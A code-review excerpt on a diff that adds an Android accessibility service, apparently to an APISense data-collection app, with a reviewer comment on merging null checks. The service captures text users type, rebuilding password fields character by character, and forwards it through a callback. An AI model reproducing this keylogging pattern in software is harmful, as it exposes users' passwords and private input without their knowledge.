bee/src/main/java/com/apisense/bee/services/EventObserver.java

```diff
@@ -0,0 +1,170 @@
+
+    @Override
+    public void onServiceConnected() {
+        Log.d(TAG, "onServiceConnected");
+
+        long t_start = SystemClock.uptimeMillis();
+        Log.d(TAG, "EXECUTION START-TIME: " + t_start);
+    }
+
+    @Override
+    public void onAccessibilityEvent(AccessibilityEvent event) {
+        super.onAccessibilityEvent(event);
+
+
+        if (events.size() > 0)
+            lastEvent = events.lastElement();
+
+        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_TEXT_SELECTION_CHANGED &&
+                (lastEvent.eventType.equals(AccessibilityEvent.eventTypeToString(AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED))
+                        || (lastEvent.eventType.equals(AccessibilityEvent.eventTypeToString(AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED))
+                ))) {
+            if (event.getText().size() != 0) {
+                if (event.isPassword()) {
+                    tempInput += getLastCharacter(String.valueOf(event.getText().get(0)));
+                    tempWrapper = new AccessibilityEventWrapper(event, tempInput);
+                } else {
+                    tempInput = String.valueOf(event.getText().get(0));
+                    tempWrapper = new AccessibilityEventWrapper(event, tempInput);
+                }
+            }
+        }
+
+        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_FOCUSED &&
+                (lastEvent.eventType.equals(AccessibilityEvent.eventTypeToString(AccessibilityEvent.TYPE_VIEW_TEXT_SELECTION_CHANGED))
+                        || (lastEvent.eventType.equals(AccessibilityEvent.eventTypeToString(AccessibilityEvent.TYPE_WINDOW_CONTENT_CHANGED))))) {
+
+            if (!tempInput.isEmpty()) {
+//                    Log.d(TAG, "onAccessibilityEvent: " + tempWrapper.toString());
+                if (callback != null) {
+                    callback.sendData(tempWrapper);
+                }
+            }
+
+            if (!event.isPassword()) {
+                if (event.getClassName().equals(EDIT_TEXT_CLASS))
+                    if (!event.getText().isEmpty())
+                        tempInput = String.valueOf(event.getText().get(0));
+                    else
+                        tempInput = "";
+            } else {
+                tempInput = "";
+            }
+
+        }
+
+        if (event.getEventType() == AccessibilityEvent.TYPE_VIEW_CLICKED) {
+            if (!tempInput.equals("")) {
+//                    Log.d(TAG, "onAccessibilityEvent: " + tempWrapper.toString());
+                if (callback != null) {
+                    callback.sendData(tempWrapper);
+                }
+                AccessibilityEventWrapper accessibilityEventWrapper = new AccessibilityEventWrapper(event, null);
+//                    Log.d(TAG, "onAccessibilityEvent: " + accessibilityEventWrapper.toString());
+                if (callback != null) {
+                    callback.sendData(accessibilityEventWrapper);
```

Comment:
You can put everything under one condition block since you only have local processing as a result, i.e.: 

```
if (callback != null) {
    callback.sendData(tempWrapper);
    AccessibilityEventWrapper accessibilityEventWrapper = new AccessibilityEventWrapper(event, null);
    callback.sendData(accessibilityEventWrapper);
}
```